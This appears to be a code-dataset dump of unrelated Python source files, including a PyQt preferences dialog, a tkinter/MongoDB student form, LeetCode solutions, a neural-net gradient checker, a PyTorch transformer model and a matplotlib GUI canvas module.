trabajar con rutas\nfrom typing import NoReturn, List\n\nfrom PyQt5 import QtWidgets\nfrom app.views.ui.preferencias_ui import Ui_Dialog\n\nimport app.controller.Controller as Controller\nimport app.utils.settings\nfrom app import logger\nfrom app.models.model_preferences import Preferences\nfrom app.models.model_query import Query\nfrom app.utils.settings import PATH_FILE_CONFIG, write_config\n\n\nclass Preferencias(QtWidgets.QDialog):\n def __init__(self, parent: object = None) -> NoReturn:\n QtWidgets.QWidget.__init__(self, parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.other = 'otra' # campo otra del formulario\n self.state_ok = 'Ok' # estado inicial\n self.state_cancel = 'Cancelado' # final\n self.state_current = self.state_ok # actual\n\n self.setWindowTitle('Preferencias de configuracion')\n self.ui.tabWidget.setCurrentIndex(0)\n\n self.configuraciones: List[Preferences] = list()\n self.preferences_actual: Preferences = Preferences()\n self.initials_operations()\n\n # recogo todos los dias de la caja y le paso el indice del dia en el que sale\n all_items = [self.ui.BoxId.itemText(i) for i in range(self.ui.BoxId.count())]\n logger.info(all_items)\n try:\n self.ui.BoxId.setCurrentIndex(all_items.index(str(app.utils.settings.DATABASE_ID)))\n except ValueError as e:\n logger.debug(e)\n if len(all_items) == 1: # si solo hay 1 es 'otra'\n self.ui.BoxId.setCurrentIndex(all_items.index(self.other))\n else:\n # si da error por algun motivo pongo el primero\n self.ui.BoxId.setCurrentIndex(all_items.index('1'))\n\n self.common_processes()\n\n self.ui.pushButton.clicked.connect(self.search_directory)\n self.ui.BoxId.activated.connect(self.common_processes)\n\n self.ui.pushButtonAplicar.clicked.connect(self.apply_data)\n self.ui.pushButtonCerrar.clicked.connect(self.cancel)\n self.ui.pushButtonAceptar.clicked.connect(self.accept_data)\n\n def initials_operations(self) -> NoReturn:\n self.get_all_notifications()\n self.list_id()\n\n def search_directory(self) -> NoReturn:\n \"\"\"\n Se encarga de coger la ruta en la que vamos a guardar el fichero, en este caso solo buscamos directorios,\n y establecemos que la ruta raiz sea el escrotorio, que se establece en el init\n \"\"\"\n # filenames = QtGui.QFileDialog.getOpenFileName()\n # noinspection PyArgumentList\n filenames: str = QtWidgets.QFileDialog.getExistingDirectory(\n parent=self, caption=\"Select Directory\", directory=self.ui.lineRuta.text(),\n QFileDialog_Options=QtWidgets.QFileDialog.ShowDirsOnly | QtWidgets.QFileDialog.DontResolveSymlinks)\n\n if filenames is not None:\n # if not (filenames.isNull()): en python 3 filenames ya no es un\n # QString sino str\n self.ui.lineRuta.setText(filenames)\n\n def get_all_notifications(self) -> NoReturn:\n \"\"\"\n\n \"\"\"\n response_query: Query = Controller.get_preferences()\n self.configuraciones = response_query.response\n # self.configuraciones = conection_sqlite(self.db, query, True)\n if not response_query.is_empty():\n self.preferences_actual = self.configuraciones[0]\n else:\n logger.info('Information not obtained')\n\n def list_id(self) -> NoReturn:\n \"\"\"\n\n \"\"\"\n lista: list = [str(i.id) for i in self.configuraciones]\n # for i in self.configuraciones:\n # lista.append(str(i.id))\n self.ui.BoxId.clear()\n self.ui.BoxId.addItems(lista)\n self.ui.BoxId.addItem(self.other)\n\n def get_configuration(self) -> NoReturn:\n \"\"\"\n \"\"\"\n for i in self.configuraciones:\n if str(self.ui.BoxId.currentText()) == str(i.id):\n self.preferences_actual = i\n if self.ui.BoxId.currentText() == self.other:\n self.preferences_actual = Preferences()\n\n def common_processes(self) -> NoReturn:\n \"\"\"\n \"\"\"\n self.get_configuration()\n self.insert_serie()\n\n def apply_data(self) -> bool:\n preferences: Preferences = Preferences()\n preferences.id = int(self.ui.BoxId.currentText())\n preferences.url_feed = self.ui.lineNewpct.text()\n preferences.url_feed_vose = self.ui.lineShowrss.text()\n preferences.path_download = Path(self.ui.lineRuta.text())\n\n if preferences.id == self.other:\n logger.info('insert')\n Controller.insert_preferences(preferences)\n self.initials_operations()\n else:\n Controller.update_preferences(preferences)\n\n config = configparser.ConfigParser()\n config.read(PATH_FILE_CONFIG)\n config['CONFIGURABLE']['DATABASE_ID'] = str(preferences.id)\n write_config(config)\n app.utils.settings.DATABASE_ID = preferences.id\n\n return True\n\n def insert_serie(self) -> NoReturn:\n \"\"\"\n \"\"\"\n self.ui.lineNewpct.setText(self.preferences_actual.url_feed)\n self.ui.lineShowrss.setText(self.preferences_actual.url_feed_vose)\n self.ui.lineRuta.setText(str(self.preferences_actual.path_download))\n\n def cancel(self) -> NoReturn:\n \"\"\"\n Establece el estado actual en cancelado para retornar None y ejecuta reject\n \"\"\"\n self.state_current = self.state_cancel\n self.reject()\n\n def accept_data(self) -> NoReturn:\n \"\"\"\n Boton Aceptar, primero aplicas los datos, si retorna True, cierra la ventana\n \"\"\"\n if self.apply_data():\n self.accept()\n\n @staticmethod\n def get_data(parent: object = None) -> NoReturn:\n dialog = Preferencias(parent)\n dialog.exec_()\n\n\ndef main():\n qapp = QtWidgets.QApplication(sys.argv)\n Preferencias.get_data()\n return qapp\n\n\n# revisar cuando pongo otra, poner insetar en vez de otra\nif __name__ == '__main__':\n main()\n","repo_name":"procamora/series_manager","sub_path":"app/views/preferencias.py","file_name":"preferencias.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"20213058309","text":"import pymongo\r\nfrom tkinter import *\r\ndef i_student_function():\r\n root = Tk()\r\n root.title(\"Insert Into Student\")\r\n root.geometry(\"700x300\")\r\n def insertstudent():\r\n client = pymongo.MongoClient(\"mongodb://localhost:27017\")\r\n db = client.student_lib_DB\r\n collection = db.student\r\n label = Label(root, text=\"\\nInserted data successfully\\n\")\r\n label.grid(row=5,column=3)\r\n studentId = e1.get()\r\n studentName = e2.get()\r\n studentAge = e3.get()\r\n studentCountry = e4.get()\r\n db.student.insert_one(\r\n {\r\n \"std_id\":studentId,\r\n \"name\":studentName,\r\n \"age\":studentAge,\r\n \"country\":studentCountry\r\n })\r\n \r\n \r\n l1= Label(root, text=\"Student Id\")\r\n l2= Label(root, text=\"Student Name\")\r\n l3= Label(root, text=\"Student Age\")\r\n l4= Label(root, text=\"Student Country\")\r\n\r\n l1.grid(row=0, sticky=E)\r\n l2.grid(row=1, sticky=E)\r\n l3.grid(row=2, sticky=E)\r\n l4.grid(row=3, sticky=E)\r\n\r\n e1 = Entry(root)\r\n e2 = Entry(root)\r\n e3 = Entry(root)\r\n e4 = Entry(root)\r\n\r\n e1.grid(row=0, column=1)\r\n e2.grid(row=1, column=1)\r\n e3.grid(row=2, column=1)\r\n e4.grid(row=3, column=1)\r\n\r\n b1= Button(root, text='Insert', command=insertstudent)\r\n\r\n b1.grid(row=5, column=1, sticky=W, pady=4)\r\n\r\n root.mainloop()\r\n\r\n\r\n","repo_name":"shahprashant030/Student-Library-Management","sub_path":"Student Library Management/insertstudent.py","file_name":"insertstudent.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1247533332","text":"import unittest\nfrom solution import Solution, TreeNode\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n\n def test_1(self):\n root = TreeNode.fromList([3,9,20,None,None,15,7])\n \n result = self.solution.averageOfLevels(root)\n expected = [3.0000, 14.5, 11.0]\n self.assertEqual(result, expected)\n \nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"djeriko/leetcode","sub_path":"637_average_of_levels_in_binary_tree/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74004184328","text":"import numpy as np\r\nimport randInitializeWeights as diw\r\nimport nnCostFunction as ncf\r\nimport computeNumericalGradient as cng\r\n\r\n\r\ndef check_nn_gradients(lmd):\r\n # np.set_printoptions(precision=20)\r\n input_layer_size = 3\r\n hidden_layer_size = 5\r\n num_labels = 3\r\n m = 5\r\n # We generatesome 'random' test data\r\n theta1 = diw.randInitializeWeights(input_layer_size, hidden_layer_size)\r\n theta2 = diw.randInitializeWeights(hidden_layer_size, num_labels)\r\n\r\n # Reusing debugInitializeWeights to genete X\r\n X = diw.randInitializeWeights(input_layer_size - 1, m)\r\n X1 = np.hstack((np.ones((X.shape[0])).reshape(X.shape[0], 1), X))\r\n y = 1 + np.mod(np.arange(1, m + 1), num_labels)\r\n\r\n # Unroll parameters\r\n nn_params = np.concatenate([theta1.flatten(), theta2.flatten()])\r\n\r\n def cost_func(p):\r\n return ncf.ex3_nn(X, y, p, num_labels, X1, hidden_layer_size, lmd)\r\n\r\n\r\n cost, grad = cost_func(nn_params)\r\n numgrad = cng.compute_numerial_gradient(cost_func, nn_params)\r\n print(np.c_[grad, numgrad])\r\n\r\n","repo_name":"hellobigorange/my_own_machineLearning","sub_path":"my_ex4/checkNNGradients.py","file_name":"checkNNGradients.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"44750216019","text":"n = int(input())\narr = list(map(int, input().split()))\n\n\ndef findIndex(i):\n start = 0\n end = len(a) - 1\n while end >= start:\n mid = (start + end) // 2\n if i < a[mid]:\n end = mid - 1\n elif i > a[mid]:\n start = mid + 1\n else:\n return mid\n return start\n\n\na = [0] # 최장 수열을 저장할 array\nfor i in arr:\n if i > a[-1]:\n a.append(i) # 쌓여가는 최장수열의 마지막 값보다 클 경우, a에 추가\n elif i < a[-1]:\n ind = findIndex(i) # 작을 경우, 얘가 대체할 수 있는 a의 자리를 찾아서\n # (같은 값이나 i보다 작은 수 중 가장 차이가 적은 수의 자리)\n a[ind] = i # 해당 인덱스에 i값을 집어넣는다.\n# 실제 최장 수열을 찾을 필요가 없이 최장 수열의 길이만 출력하면 되기 때문에.\nprint(len(a)-1)\n","repo_name":"Joanne19-drive/python_algorithm","sub_path":"baekjoon/12015.py","file_name":"12015.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12960901702","text":"import torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\nimport math\nimport torch\n\n\n# pre_trained = torch.hub.load(\n# 'huggingface/pytorch-transformers', 'model', 'bert-base-uncased')\n\n\nclass Embed(nn.Module):\n def __init__(self, d_model, vocab):\n super(Embed, self).__init__()\n # self.lut = pre_trained.embeddings.word_embeddings\n self.lut = nn.Embedding(vocab, d_model)\n self.lut.weight.data.uniform_(-0.1, .1)\n # v_trained = pre_trained.embeddings.word_embeddings.weight.shape[0]\n # self.lut.weight.data[0:v_trained] = pre_trained.embeddings.word_embeddings.weight\n self.d_model = d_model\n\n # for param in self.lut.parameters():\n # param.requires_grad = False\n\n # handle subword encodings\n def forward(self, x):\n return self.lut(x) * math.sqrt(self.d_model)\n\n\nclass TransformerSentiment(nn.Module):\n def __init__(self, vocab, pos, d_embed, hidden_d, layers, nhead=2, dropout=.2):\n super(TransformerSentiment, self).__init__()\n\n self.embed = Embed(d_embed, vocab)\n self.pos = Embed(d_embed, pos)\n\n self.pos_embed = PositionalEncoding(\n d_embed, max_len=150, dropout=dropout)\n\n enc_layer = nn.TransformerEncoderLayer(\n d_model=d_embed, nhead=nhead, dim_feedforward=hidden_d, dropout=dropout)\n self.transformer = nn.TransformerEncoder(enc_layer, num_layers=layers)\n\n self.fc_start = nn.Linear(150*d_embed, 150)\n self.fc_end = nn.Linear(150*d_embed, 150)\n\n self.mask = None\n\n initrange = 0.1\n\n self.fc_start.bias.data.zero_()\n self.fc_start.weight.data.uniform_(-initrange, initrange)\n self.fc_end.bias.data.zero_()\n self.fc_end.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, seq, pos):\n\n if self.mask is None or self.mask.shape != seq.shape:\n self.mask = torch.zeros(seq.shape).to(seq.device)\n\n seq_mask = self.mask == seq\n emb = self.embed(seq)\n pos = self.pos(pos)\n\n seq = self.pos_embed(emb + pos).transpose(0, 1)\n seq = self.transformer(\n seq, src_key_padding_mask=seq_mask).transpose(0, 1)\n B = seq.shape[0]\n S = seq.shape[1]\n\n # start = self.fc_start(self.c_act(self.conv_start(seq.permute(0,2,1))).view(B, -1))\n # end = self.fc_end(self.c_act(self.conv_end(seq.permute(0,2,1))).view(B, -1))\n\n start = self.fc_start(seq.reshape(B, -1))\n end = self.fc_end(seq.reshape(B, -1))\n return start, end\n\n# Retrieved from pytorch website\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, dropout=0.0, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(\n 0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.shape[0], :]\n return self.dropout(x)\n\nclass SmoothingLoss(nn.Module):\n def __init__(self, smoothing=0.0, n_classes=150):\n super(SmoothingLoss, self).__init__()\n self.confidence = 1.0 - smoothing\n self.smoothing = smoothing\n self.cls = n_classes\n self.dim = 1\n\n def forward(self, pred, target, selection):\n pred = pred.log_softmax(dim=self.dim)\n with torch.no_grad():\n # true_dist = pred.data.clone()\n true_dist = torch.zeros_like(pred)\n true_dist.fill_(self.smoothing / (self.cls - 1))\n true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)\n true_dist = true_dist * (selection != -1).float()\n return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))\n\nclass Loss(nn.Module):\n def __init__(self, smoothing=0.0, n_classes=150):\n super(Loss, self).__init__() \n self.start_loss = SmoothingLoss(smoothing=smoothing, n_classes=n_classes)\n self.end_loss = SmoothingLoss(smoothing=smoothing, n_classes=n_classes)\n\n def forward(self, y_hat_start, start, y_hat_end, end, selection):\n return (self.start_loss(y_hat_start, start, selection) + self.end_loss(y_hat_end, end, selection)) * 0.5\n\n","repo_name":"ammuh/twitter-sentiment-extraction","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14337393442","text":"'''\n@Author:Sailesh Chauhan\n@Date:2021-06-08\n@Last Modified by:Sailesh Chauhan\n@Last Modified time:2021-06-09\n@Title: Create set Add Element Iterate through set element.\n'''\n\n#Importing logConfig for error logging\nimport logconfig\nimport logging\n\ndef create_set():\n '''\n Description:\n Parameters:\n Returns:\n '''\n try:\n defaultSet=set()\n choice=''\n print(\"You can enter any value in set\")\n while(choice.lower()!='q'):\n userValue=input(\"Enter value to add in set\\n\")\n defaultSet.add(userValue)\n print(\"Do you want to add more values \\nPress C to continue\\nQ to stop\\n\")\n choice=input(\"Enter choice\\n\")\n return defaultSet\n except Exception as ex:\n logging.error(ex)\n\n\ndef iterate_set(set=create_set()):\n '''\n Description:\n Parameters:\n Returns:\n '''\n try:\n for eachSetItem in set:\n print(eachSetItem)\n except Exception as ex:\n logging.error(ex)\n\niterate_set()\n","repo_name":"saileshchauhan/PythonProgram","sub_path":"DataStructure/Sets/1_Sets_create_add_iterate.py","file_name":"1_Sets_create_add_iterate.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32470540959","text":"from tkinter import ttk\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\n\nimport numpy as np\n\nfrom display import ImageDisplay, ObjectDisplay\n\nclass CanvasFullImage():\n\n def __init__(self, frame_container, controller = None):\n self.controller = controller\n\n # Configure layout of frame\n frame_container.columnconfigure(0, weight = 1)\n frame_container.rowconfigure(1, weight = 1)\n\n # Initialize figure and adjust subplot area to maximize display\n fig = Figure(facecolor = [0.15, 0.15, 0.16])\n fig.subplots_adjust(left = 0.0, bottom = 0.0, \n right = 1.0, top = 1.0, \n wspace = 0, hspace = 0)\n\n # Initialize subplot area, without axis\n axis_img = fig.add_subplot(111)\n axis_img.axis('off')\n\n # Add canvas to the figure within the frame of the window\n canvas = FigureCanvasTkAgg(fig, master = frame_container)\n frame_canvas = canvas.get_tk_widget()\n frame_canvas.grid(row = 1, column = 0, sticky = 'nsew')\n\n # Add matplotlib toolbar to the figure within the frame of the window\n frame_itoolbar = ttk.Frame(frame_container)\n frame_itoolbar.grid(row = 0, column = 0, sticky = 'nsew')\n t_img = NavigationToolbar2Tk(canvas, frame_itoolbar)\n\n # Store canvas and axis image in object\n self.canvas = canvas\n self.axis_img = axis_img\n\n def clear_axis(self):\n\n # clear axis\n self.axis_img.clear() \n # Take off axis\n self.axis_img.axis('off')\n\n def clear_showimage(self, img, **kwargs):\n\n # Get image axis, colormap and channels for display\n img_axis = kwargs.get('axis_img', self.axis_img)\n\n # Get the display settings from the app. This only works for the main display\n # If the dislay is from a different window, there are no settings, and they need to be specified\n display_settings = ['cmap', 'channel']\n try:\n display_settings[0] = self.controller.appdata_colormap['channels']\n except AttributeError as e:\n display_settings = [None, None]\n else:\n display_settings[1] = self.controller.appdata_channels['current'].get()\n\n # Get colormap options\n cmap_options = kwargs.get('cmap', display_settings[0])\n # Get current channel\n current_channel = kwargs.get('channel', display_settings[1])\n\n # Set the image to the current channel and correct the colormap if necessary\n if current_channel != 0:\n try:\n img = img[:,:,current_channel - 1]\n except IndexError as e:\n if type(cmap_options) == str:\n cmap_options = [None, cmap_options]\n\n # Clear the previous shown image and show new image, keep displayed image object\n try:\n self.s_img.remove()\n except (AttributeError, ValueError):\n pass\n \n self.s_img = ImageDisplay.show_image(img, img_axis, cmap_options, current_channel)\n self.canvas.draw()\n\n # If required, update the current working image\n update_current = kwargs.get('update_current', False)\n if update_current == True:\n self.shown_ascurrent(img, current_channel)\n\n def clear_showobject(self, drawn_object, **kwargs):\n\n # Get image axis where to display\n img_axis = kwargs.get('axis_img', self.axis_img)\n # Get label of old artist objects\n label_old = kwargs.get('label_old', 'vesicle')\n \n # Clear old patch objects\n if label_old == 'all':\n old_objects = [x for x in img_axis.patches]\n old_text = [x for x in img_axis.texts]\n else:\n old_objects = [x for x in img_axis.patches if label_old == x.get_label()]\n old_text = [x for x in img_axis.texts if label_old in x.get_label()]\n\n for patch in old_objects:\n img_axis.patches.remove(patch)\n for s in old_text:\n img_axis.texts.remove(s)\n\n # If the drawn_object is not none, it adds the artists\n if drawn_object is not None: \n # Draw text with information or the new artist objects\n if drawn_object[0] == 'text_info':\n ObjectDisplay.text_info(drawn_object[1], img_axis, **kwargs)\n else:\n ObjectDisplay.show_object(drawn_object, img_axis, **kwargs)\n \n # Draw canvas\n self.canvas.draw()\n \n def overlay_mask(self, mask, **kwargs):\n \n # Get colormap and alpha options\n colormap = kwargs.get('colormap', 'inferno')\n c_alpha = kwargs.get('alpha', 0.5)\n\n # Get option to remove old mask\n remove_old = kwargs.get('remove_old', False)\n if remove_old is True:\n try:\n self.s_mask.remove()\n except (AttributeError, ValueError) as e:\n pass\n\n # Show mask on axis without clearing it\n self.s_mask = self.axis_img.imshow(mask, alpha = c_alpha, cmap = colormap, zorder = 10)\n\n # Draw canvas\n self.canvas.draw()\n\n def clear_showscatter(self, scatter_points, **kwargs):\n\n # Get image axis where to display\n img_axis = kwargs.get('axis_img', self.axis_img)\n\n # Get label of old artist objects\n label_old = kwargs.get('label_old', 'scatter')\n # Get label of new artist objects\n label_new = kwargs.get('label', 'scatter')\n\n # Get option to remove old objects\n remove_old = kwargs.get('remove_old', False)\n\n # Get color for the scatter points\n scolor = kwargs.get('color', 'blue')\n\n # clear old objects if required\n if remove_old is True:\n old_scatter = [x for x in img_axis.collections if label_old in x.get_label()]\n for s in old_scatter:\n img_axis.collections.remove(s)\n \n # If the scatter points is not none, add the collection with the desired label\n if scatter_points is not None:\n img_axis.scatter(scatter_points[0], scatter_points[1], s = 1, marker = '.',\n c = scolor, label = label_new)\n\n # Draw canvas\n self.canvas.draw()\n \n def show_scattermask(self, mask, **kwargs):\n\n # Get the coordinates of the mask\n ye, xe = np.where(mask)\n\n # If there is an offset, add it to the coordinates\n offset_points = kwargs.get('offset', [0,0])\n xe = xe + offset_points[0]\n ye = ye + offset_points[1]\n\n # Get the color for hte points drawn\n point_color = kwargs.get('color', 'orange')\n # By default remove the previous scatter plot\n remove_old = kwargs.get('remove_old', True)\n # Get label to add\n label_scatter =kwargs.get('label', 'scatter')\n\n # Remove old scatter plot if desired\n if remove_old is True:\n try:\n self.s_smask.remove()\n except (AttributeError, ValueError):\n pass\n\n # Show the points overlayed\n self.s_smask = self.axis_img.scatter(xe, ye, s = 1, marker = '.', c = point_color, label = label_scatter)\n\n # Draw canvas\n self.canvas.draw()\n\n def shown_ascurrent(self, img, channel):\n\n if (channel == 0) or (self.controller.appdata_imagecurrent.ndim == 2):\n self.controller.appdata_imagecurrent = 1*img\n else:\n self.controller.appdata_imagecurrent[:,:,channel - 1] = 1*img\n\n def bind_onpick(self, **kwargs):\n\n # Get additional arguments\n delete_on_disconnect = kwargs.get('delete_on_disconnect', True)\n off_color = kwargs.get('off_color', 'yellow')\n on_color = kwargs.get('on_color', 'skyblue')\n custom_callback = kwargs.get('custom_callback', False)\n\n # Check if the canvas has been connected to the pick_event\n try:\n self.canvas.mpl_disconnect(self.cid_pick)\n except AttributeError:\n if custom_callback == False:\n # Connect the mpl with the pick event#\n # If the callback is custom, the mpl is connected outside of this function\n self.cid_pick = self.canvas.mpl_connect('pick_event', lambda event: self.select_object(event))\n # Initialise selected objects variable\n self.object_selected = []\n # Configure all the text objects in the canvas to be pickable\n for s in self.axis_img.texts:\n s.set(picker = 20, color = on_color)\n state_mpl = 'connected'\n else:\n del self.cid_pick\n if delete_on_disconnect == True: \n del self.object_selected\n for s in self.axis_img.texts:\n s.set(picker = False, color = off_color)\n state_mpl = 'disconnected'\n\n self.canvas.draw()\n\n return state_mpl\n\n def bind_right(self, input_data, **kwargs):\n \n # Get the option to add a custom callback\n custom_callback = kwargs.get('custom_callback', False)\n\n # Check if the canvas has been connected to the right-click event and disconnect\n try:\n self.canvas.mpl_disconnect(self.cid_right)\n except AttributeError:\n if custom_callback == False:\n # If no custom callback is needed, connect the mpl with the right click event \n self.cid_right = self.canvas.mpl_connect('button_press_event', lambda event: self.delete_selected(event, input_data, **kwargs))\n else:\n del self.cid_right\n\n def select_object(self, event,**kwargs):\n\n # Only proceed if the event was triggered with the left click\n if event.mouseevent.button == 1:\n # Get the artist that was selected and highlight it\n selected_object = event.artist\n selected_object.set(color = 'deeppink')\n # Ge the text, it should be equal to the vesicle id\n selected_id = int(selected_object.get_text()) - 1\n # Add selected id to the variable of selected objects\n self.object_selected.append(selected_id)\n \n # Update canvas\n self.canvas.draw()\n\n def delete_selected(self, event, input_data, **kwargs):\n\n if event.button == 3:\n # Keep only the unique elements of the object selection and clear original variable\n selected_ids = list(set(self.object_selected))\n self.object_selected = []\n\n # Delete the selected objects from input data (input data is numpy array)\n clean_data = np.delete(input_data[1], selected_ids, axis = 0)\n input_data[1] = clean_data\n\n # Delete the selected objects from the mask data\n mask_data = kwargs.get('input_mask', None)\n if mask_data is not None:\n for s_ind in selected_ids:\n mask_data[mask_data == (s_ind+1)] = 0\n for ic, ilabel in enumerate(np.unique(mask_data.flatten())[1:]):\n mask_data[mask_data == ilabel] = ic+1\n self.s_mask.remove()\n self.overlay_mask(mask_data, alpha = 0.3)\n # Update canvas with the clean results\n self.clear_showobject(input_data, textcolor = 'skyblue', pick = 20)\n\nclass CanvasEmbeddedPlot():\n\n def __init__(self, frame_container, controller = None, **kwargs):\n self.controller = controller \n\n # Configure layout of frame\n frame_container.columnconfigure(0, weight = 1)\n frame_container.rowconfigure(1, weight = 1)\n\n # Initialize figure and subplot area\n fig = Figure()\n axis_plot = fig.add_subplot(111)\n fig.set_tight_layout(True)\n # Set fontsize as 'small' if required\n small_font = kwargs.get('small_font', False)\n if small_font is True:\n for item in ([axis_plot.xaxis.label, axis_plot.yaxis.label] + \n axis_plot.get_xticklabels() + axis_plot.get_yticklabels()):\n item.set_fontsize(8)\n\n\n # Add canvas to the figure wihtin the frame\n canvas = FigureCanvasTkAgg(fig, master = frame_container)\n frame_canvas = canvas.get_tk_widget()\n frame_canvas.grid(row = 1, column = 0, sticky = 'nsew')\n\n # Add matplotlib toolbar to the figure within the frame\n frame_itoolbar = ttk.Frame(frame_container)\n frame_itoolbar.grid(row = 0, column = 0, sticky = 'nse')\n t_plot = NavigationToolbar2Tk(canvas, frame_itoolbar)\n\n # Store canvas and axis plot in object\n self.canvas = canvas\n self.axis_plot = axis_plot\n\n def plot_histogram(self, bin_data, counts, **kwargs):\n\n # Get data label\n data_label = kwargs.get('data_label', 'Data')\n\n # Calculate the appropriate bar width\n bar_width = 0.9*(bin_data[1]-bin_data[0])\n\n # Clear axis first\n self.axis_plot.cla()\n\n # Plot the histogram with the barplot\n self.axis_plot.bar(bin_data, counts, \n edgecolor = 'slategray', facecolor = 'lightsteelblue', linewidth = 1,\n label = data_label, width = bar_width)\n\n # Add the axis labels\n x_label = kwargs.get('x_label', 'x')\n y_label = kwargs.get('y_label', 'counts')\n self.axis_plot.set_xlabel(x_label)\n self.axis_plot.set_ylabel(y_label)\n\n # Set the axis limits\n self.axis_plot.set_xlim([0, bin_data[-1]+ 2*bar_width])\n\n # Add the legend\n self.axis_plot.legend()\n \n # Draw canvas\n self.canvas.draw()\n\n def plot_fit(self, x, y_fit, fit_param_dict):\n\n # Plot the fitted data as a curve\n self.axis_plot.plot(x, y_fit, c = 'mediumvioletred', lw = 2, label = 'Fit')\n # Redraw legend\n self.axis_plot.legend()\n\n # Add text with parameters of the fit\n text_string = ''\n for key, value in fit_param_dict.items():\n try:\n text_string = f'{text_string}\\n{key}: {value[0]:.1f} +/- {value[1]:.2f}'\n except TypeError:\n text_string = f'{text_string}\\n{key}: {value:.1f}'\n \n self.axis_plot.text(0.02, 0.95, text_string, c = 'mediumvioletred', size = 9,\n ha = 'left', va = 'center', transform = self.axis_plot.transAxes)\n\n # Configure y_axis to cover slightly more than the maximum and the legend can fit nicely\n self.axis_plot.set_ylim([0, 1.3*np.max(y_fit)])\n\n # Draw canvas\n self.canvas.draw()\n\n def plot_line(self, x, y, **kwargs):\n\n # get label to be able to remove objects\n label = kwargs.get('label', 'line')\n # Get option to dim the old profiles\n dim_old = kwargs.get('dim_old', True)\n\n # Get x and y labels\n xlabel = kwargs.get('xlabel', 'x')\n ylabel = kwargs.get('ylabel', 'y')\n\n # Get color of the line and alpha value\n cline = kwargs.get('color', 'steelblue')\n alpha_line = kwargs.get('alpha', 1)\n\n # Get text to label the curves if required\n textlabel = kwargs.get('textlabel', None)\n \n # Set a higher transparency for older lines\n if dim_old is True:\n for line in self.axis_plot.lines:\n line.set(alpha = 0.2)\n for s in self.axis_plot.texts:\n s.set(alpha = 0.3)\n \n # Plot the data as a 2D curve\n self.axis_plot.plot(x, y, c = cline, lw = 1, label = label, marker = '.', ms = 1, alpha = alpha_line)\n # Add a text label to the curve, if required\n if textlabel is not None:\n self.axis_plot.text(x[-1], y[-1], s = textlabel, size = 6, color = cline)\n # Set the x and y axis labels\n self.axis_plot.set_xlabel(xlabel)\n self.axis_plot.set_ylabel(ylabel)\n \n # Draw canas\n self.canvas.draw()\n \n def plot_secline(self, x, y, **kwargs):\n\n if not hasattr(self, 'axis_ploty2'):\n # Add the secondary axis, if needed\n self.axis_ploty2 = self.axis_plot.twinx()\n \n # get label to be able to remove objects\n label = kwargs.get('label', 'secline')\n # Get option to dim old results\n dim_old = kwargs.get('dim_old', True)\n\n # Get y labels\n ylabel = kwargs.get('ylabel', 'y')\n # Get color of the line\n cline = kwargs.get('color', 'slategray')\n\n # Get text to label the curves if required\n textlabel = kwargs.get('textlabel', None)\n\n # Set a higher transparency for older lines\n if dim_old is True:\n for line in self.axis_ploty2.lines:\n line.set(alpha = 0.2)\n for s in self.axis_ploty2.texts:\n s.set(alpha = 0.3)\n \n # Plot the data as a 2D curve in the secondary y-axis\n self.axis_ploty2.plot(x, y, c = cline, lw = 1, label = label, alpha = 0.5)\n # Add a text label to the curve, if required\n if textlabel is not None:\n self.axis_ploty2.text(x[0], y[0], s = textlabel, size = 6, color = cline)\n # Set the x and y axis labels\n self.axis_ploty2.set_ylabel(ylabel)\n \n # Draw canas\n self.canvas.draw()\n\n \n\n","repo_name":"DisGUVery/disguvery","sub_path":"disguvery/ui_canvas.py","file_name":"ui_canvas.py","file_ext":"py","file_size_in_byte":17412,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"31301856824","text":"class Solution:\n def plusOne(self, digits: List[int]) -> List[int]:\n \"\"\"\n Runtime Complexity: O(n)\n Space Complexity: O(n)\n Algorithm: Turn digits into number, add it by 1, convert number to string, pass in each digit to new array\n \"\"\"\n number = 0\n\n for i in range(len(digits)):\n number += digits[i] * 10**(len(digits)-(i+1))\n \n number += 1\n\n number = str(number)\n\n new_digits = []\n\n for i in range(len(number)):\n new_digits.append(int(number[i]))\n\n return new_digits","repo_name":"abdulolagunju19/Leetcode-Solutions","sub_path":"Abdul solutions/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27555144214","text":"from graphics import *\nimport time\n\ndef main():\n win=GraphWin(\"my first window\", 500, 300)\n win.setBackground(\"blue\")\n\n 